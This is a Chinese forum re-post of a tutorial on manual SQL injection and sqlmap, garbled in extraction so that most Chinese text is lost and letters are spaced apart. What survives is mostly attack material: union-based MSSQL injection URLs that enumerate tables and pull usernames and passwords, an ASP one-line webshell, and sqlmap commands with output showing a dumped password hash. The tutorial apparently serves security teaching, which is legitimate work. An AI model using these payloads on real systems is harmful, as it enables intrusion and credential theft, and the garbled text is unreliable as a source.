搜索

[21423] 2020-11-20_[网络安全]四.手工SQL注入和SQLMAP入门基础及案例详解

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-18
2020-11-20_[网络安全]四.手工SQL注入和SQLMAP入门基础及案例详解 [ ]   . S Q L S Q L M A P   L e m o n S e c   2 0 2 0 - 1 1 - 2 0 [ ]   . W e b [ ]   . W e b C D N [ ]   . I P 广 1 0 0 W e b S Q L S Q L S Q L M A P S Q L A I P y t h o n W e b C V E 绿 . S Q L . S Q L M A P . .
. S Q L S Q L S Q L S Q L S Q L S Q L M A P J u s t i n   C l a r k e S Q L S Q L M S S Q L A S P h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 S Q L s e l e c t   . . . .   f r o m   t a b l e   w h e r e   c o d e = ' 1 1 5 '   a n d   x x x x ; s h o w . a s p ? c o d e = 1 1 5 '   s h o w . a s p ? c o d e = 1 1 5 - 1   1 h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   a n d   1 = 1   -   -   ( ) S Q L s e l e c t   . . . .   f r o m   t a b l e   w h e r e   c o d e = ' 1 1 5 '   a n d   1 = 1   -   -   a n d   x x x x ; ( ' ) c o d e = ' 1 1 5 a n d 1 = 1 S Q L ( -   - ) h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   a n d   1 = 2   -   -   ( ) S Q L s e l e c t   . . . .   f r o m   t a b l e   w h e r e   c o d e = ' 1 1 5 '   a n d   1 = 2   -   -   a n d   x x x x ; ( ' ) c o d e = ' 1 1 5 a n d 1 = 2 ( - - )   o r d e r   b y h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   o r d e r   b y   1   - -   ( ) S Q L s e l e c t   . . . .   f r o m   t a b l e   w h e r e   c o d e = ' 1 1 5 '   o r d e r   b y   1   - -   a n d   x x x x ; 1 U R L S Q L h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   o r d e r   b y   1 0   - -   ( ) S Q L s e l e c t   . . . .   f r o m   t a b l e   w h e r e   c o d e = ' 1 1 5 '   o r d e r   b y   1 0   - -   a n d   x x x x ;
o r d e r   b y   1 1 1 0 h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   o r d e r   b y   1 1   - -   ( ) u n i o n 使 u n i o n u n i o n   a l l u n i o n s e l e c t u n i o n   a l l h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   u n i o n   a l l   s e l e c t   n u l l , . . . , n u l l   - - 1 0 n u l l 9 n u l l 1 0 h t t p : / / x x x x x / s h o w . a s p ? c o d e = 1 1 5 '   u n i o n   a l l   s e l e c t   1 , . . . , n u l l   - -   n u l l s h o w . a s p ? c o d e = 1 1 5 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 , 9 , 1 0   - - S Q L s e l e c t   . . . .   f r o m   t a b l e   w h e r e   c o d e = ' 1 1 5 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 , 9 , 1 0   -   -   x x x x ; h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 '   u n i o n   a l l   s e l e c t   1 , . . . , n u l l   -   - 1 1 5 - 1 7 8 9
d b _ n a m e 使 M S S Q L h o s t _ n a m e ( ) @ @ v e r s i o n d b _ n a m e ( ) @ @ s e r v e r n a m e = h o s t _ n a m e ( ) U R L h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , h o s t n a m e ( ) , @ @ v e r s i o n , d b n a m e ( ) , 1 0   - - 1 A Y D 2 M i c r o s o f t   S Q L   S e r v e r . . . . 3 a h y k d _ n e w a h y k d _ n e w P y t h o n S Q L   S e r v e r s y s o b j e c t s   s y s c o l u m n s   n a m e i d t y p e U S C P K s y s o b j e c t s     s y s c o l u m n s   i d s y s o b j e c t s i d s y s c o l u m n s   s e l e c t   n a m e   f r o m   s y s o b j e c t s   w h e r e   t y p e = ' U ' ; t a b l e 1   s e l e c t   n a m e   f r o m   s y s c o l u m n s   w h e r e   i d = o b j e c t _ i d ( ' t a b l e 1 ' ) h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 ' u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 , ( s e l e c t   t o p   1   n a m e   f r o m   s y s o b j e c t s w h e r e   t y p e = ' U ' ) , 1 0   - - 1 7
2 8 3 k c _ j x j d t o p   1   n a m e 1 M y S Q L 使 l i m i t   1 s y s o b j e c t s u c o u n t ( * ) 8 7 P S 1 h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 ,   ( s e l e c t   t o p   1   n a m e   f r o m   ( s e l e c t   t o p   2   n a m e   f r o m   s y s o b j e c t s   w h e r e t y p e = ' U '   o r d e r   b y   d e s c )   a   o r d e r   b y   1   a s c ) , 1 0   - - t o p   3 P y t h o n S e l e n i u m 访 t o p   n P y t h o n W e b u s r u s r u s r   i d = o b j e c t _ i d ( ' u s r ' ) h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 ' u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 , ( s e l e c t   t o p   1   n a m e   f r o m   s y s c o l m n s w h e r e   i d = o b j e c t _ i d ( ' u s r ' ) ) , 1 0   - - 1 7 2 8 3 a n s w e r t o p   1   n a m e 1 u s r S Q L ( s e l e c t   t o p   1   n a m e   f r o m   ( s e l e c t   t o p   3   n a m e   f r o m   s y s c o l u m n s   w h e r e   i d = o b j e c t _ i d ( ' u s r ' )   o r d e r   b y   a s c )   a   o r d e r   b y   1   d e s c ) 1 7 2 8 3 d i c _ r o l l
P y t h o n c o u n t ( * ) u s r _ n a m e p a s s w d h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 , ( s e l e c t   t o p   1   u s r _ n a m e   f r o m   u s r ) , 1 0   - - 1 7 2 8 3 2 0 1 6 0 0 1 2 0 1 6 0 0 1 h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 ,   ( s e l e c t   p a s s w d   f r o m   u s r   w h e r e   u s r _ n a m e = ' 2 0 1 6 0 0 1 ' ) , 1 0   - - 1 7 2 8 3 1 2 3 4 5 6 2 0 1 6 0 0 1 1 2 3 4 5 6 P y t h o n W e b S h e l l S Q L M A P S Q L < % e v a l   r e q u e s t ( " N a n a " )   % > . S Q L M A P S Q L M A P S Q L P y t h o n 访 P y t h o n P y t h o n S Q L M A P K a l i P y h o n p i p   i n s t a l l   s q l m a p G i t h u b S Q L M A P   h t t p s : / / g i t h u b . c o m / s q l m a p p r o j e c t / s q l m a p
c d P y t h o n s q l m a p p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . . / t z t g x x . a s p x ? c o d e = 1 1 5 " - u u r l G E T b o o l e a n - b a s e d   b l i n d s t a c k e d   q u e r i e s t i m e - b a s e d   b l i n d U N I O N   q u e r y S Q L A N D   1 3 2 7 = 1 3 2 7 U N I O N   A L L W i n d o w s   2 0 0 0 W e b A S P . N E T A S P . N E T   2 . 0 ,   M i c r o s o f t   I I S   5 . 0 M i c r o s o f t   S Q L   S e r v e r   2 0 0 0 S Q L - - d b s p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . / t z t g x x . a s p x ? c o d e = 1 1 5 "   - - d b s 9 - - d b s d a t a b a s e s
- - c u r r e n t - d b p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . / t z t g x x . a s p x ? c o d e = 1 1 5 "   - - c u r r e n t - d b 9 - - c u r r e n t - d b M S S Q L d b _ n a m e ( ) a k y k d _ n e w h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 '   u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , h o s t n a m e ( ) , @ @ v e r s i o n , d b n a m e ( ) , 1 0   - - 3 a h y k d _ n e w a h y k d _ n e w - - u s e r s p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . / t z t g x x . a s p x ? c o d e = 1 1 5 "   - - u s e r s
2 B U I L T I N A d m i n s t r a t o r s s a - - c u r r e n t - u s e r p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . / t z t g x x . a s p x ? c o d e = 1 1 5 "   - - c u r r e n t - u s e r s a - - p a s s w o r d s p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . / t z t g x x . a s p x ? c o d e = 1 1 5 "   - - p a s s w o r d s
d a t a b a s e   m a n a g e m e n t   s y s t e m   u s e r s   p a s s w o r d   h a s h e s :   [   *   ]   B U I L T I N A d m i n i s t r a t o r s   [ 1 ] :   p a s s w o r d   h a s h :   N U L L   [   *   ]   s a   [ 1 ] :   p a s s w o r d   h a s h : 0 x 0 1 0 0 6 e 2 7 6 5 3 a 3 6 b b c 7 9 0 7 e c 4 5 a 0 0 6 0 . . . - D   a h y k d _ n e w   - - t a b l e s p y t h o n   s q l m a p . p y   - u   " h t t p : / / . . . / t z t g x x . a s p x ? c o d e = 1 1 5 "   - D   a h y k d _ n e w   - - t a b l e s a h y k d _ n e w - D - - t a b l e s u s r h t t p : / / x x x x x / s h o w . a s p ? c o d e = - 1 ' u n i o n   a l l   s e l e c t   1 , n u l l , 3 , n u l l , n u l l , 6 , 7 , 8 , ( s e l e c t   t o p   1   n a m e   f r o m   s y s o b j e c t s   w h e r e   t y p e = ' U ' ) , 1 0   - - 1 7 2 8 3 k c _ j x j d t o p   1   n a m e 1 s y s o b j e c t s u
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理